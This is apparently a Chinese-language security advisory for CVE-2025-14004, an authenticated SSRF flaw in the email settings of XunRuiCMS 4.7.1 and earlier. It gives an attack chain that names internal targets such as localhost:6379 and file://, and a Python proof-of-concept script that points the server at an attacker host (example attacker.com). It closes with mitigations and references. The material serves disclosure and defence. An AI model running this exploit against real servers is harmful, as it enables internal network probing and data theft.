CVE-2025-14004 dayrui XunRuiCMS Email组件SSRF漏洞

漏洞信息

漏洞编号

CVE-2025-14004

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

dayrui XunRuiCMS

漏洞概述

CVE-2025-14004是dayrui XunRuiCMS 4.7.1及之前版本中存在的一个服务器端请求伪造（SSRF）安全漏洞。该漏洞位于邮件设置处理器（Email Setting Handler）的未知函数中，具体路径为/admind45f74adbd95.php?c=email&m=add。攻击者可以通过构造恶意请求，操纵服务器向任意内部或外部资源发起请求，从而可能导致敏感信息泄露、内网扫描、端口探测等攻击。由于该漏洞需要高权限认证才能利用，因此主要威胁对象为具有管理权限的账户被攻击者控制的情况。该漏洞的PoC已公开，厂商在收到早期通知后未做出任何回应，用户需自行采取防护措施。

技术细节

该漏洞属于典型的服务器端请求伪造（SSRF）漏洞。攻击者利用邮件设置功能中的参数注入点，通过控制HTTP请求的目标地址，使服务器向攻击者指定的URL发起请求。在/Admind45f74adbd95.php文件的email组件add函数中，应用程序未能对用户输入的URL参数进行严格验证和过滤，导致攻击者可以指定任意内部（如localhost、127.0.0.1）或外部地址。攻击者通常利用此漏洞进行内网资源探测、读取本地文件（如file://协议）、扫描内部服务端口等操作。由于请求由服务器端发起，可以绕过防火墙等边界设备的限制，访问通常无法直接到达的内部系统。CVSS 3.1向量显示该漏洞需要高权限认证（PR:H），无用户交互要求（UI:N），网络可达（AV:N），对机密性、完整性和可用性均为低影响。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标站点使用dayrui XunRuiCMS，并确定版本号 <= 4.7.1

STEP 2

步骤2: 认证访问

攻击者获取管理员账户权限（通过凭证泄露、暴力破解或社工攻击）

STEP 3

步骤3: 构造恶意请求

攻击者构造针对/admind45f74adbd95.php的POST请求，在邮件配置参数中注入恶意URL

STEP 4

步骤4: SSRF利用

服务器执行请求时，会向攻击者指定的内部地址（如localhost:6379、file://等）发起请求

STEP 5

步骤5: 数据窃取/内网渗透

攻击者通过SSRF响应获取内网服务返回的敏感数据，或利用返回信息进行进一步内网攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import sys # CVE-2025-14004 PoC - XunRuiCMS SSRF in Email Setting Handler # Target: /admind45f74adbd95.php?c=email&m=add def exploit_srf(target_url, attacker_server): """ Exploit SSRF vulnerability in XunRuiCMS email settings :param target_url: Target XunRuiCMS installation URL :param attacker_server: Attacker's controlled server URL """ endpoint = f"{target_url}/admind45f74adbd95.php" params = { 'c': 'email', 'm': 'add' } # Inject malicious URL via email configuration parameter data = { 'email_host': attacker_server, 'email_port': '80', 'email_user': '[email protected]', 'email_pass': 'password', 'email_from': attacker_server, 'email_test': '1' } try: response = requests.post(endpoint, params=params, data=data, timeout=10) print(f"[*] Request sent to {endpoint}") print(f"[*] Response status: {response.status_code}") return response except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None def main(): if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <attacker_server>") print(f"Example: python {sys.argv[0]} http://target.com http://attacker.com:8080") sys.exit(1) target = sys.argv[1] server = sys.argv[2] print(f"[*] Exploiting CVE-2025-14004 SSRF on {target}") exploit_srf(target, server) if __name__ == "__main__": main()

影响范围

dayrui XunRuiCMS <= 4.7.1

防御指南

临时缓解措施

由于厂商未回应修复通知，建议管理员临时采取以下措施：1）限制对邮件设置功能的访问，仅允许受信任的管理员IP；2）使用网络层访问控制，禁止服务器访问内网私有IP段；3）监控邮件配置相关的访问日志，及时发现异常请求；4）考虑暂时禁用邮件测试功能，待官方发布修复补丁后再启用。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14004
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14004
3 Details https://www.cvedetails.com/cve/CVE-2025-14004/
4 VulDB https://vuldb.com/cve/CVE-2025-14004
5 Link https://github.com/24-2021/vul/blob/main/xunruicms-email_test-SSRF/xunruicms-email_test-SSRF.md
6 Link https://vuldb.com/?ctiid.334246
7 Link https://vuldb.com/?id.334246
8 Link https://vuldb.com/?submit.692907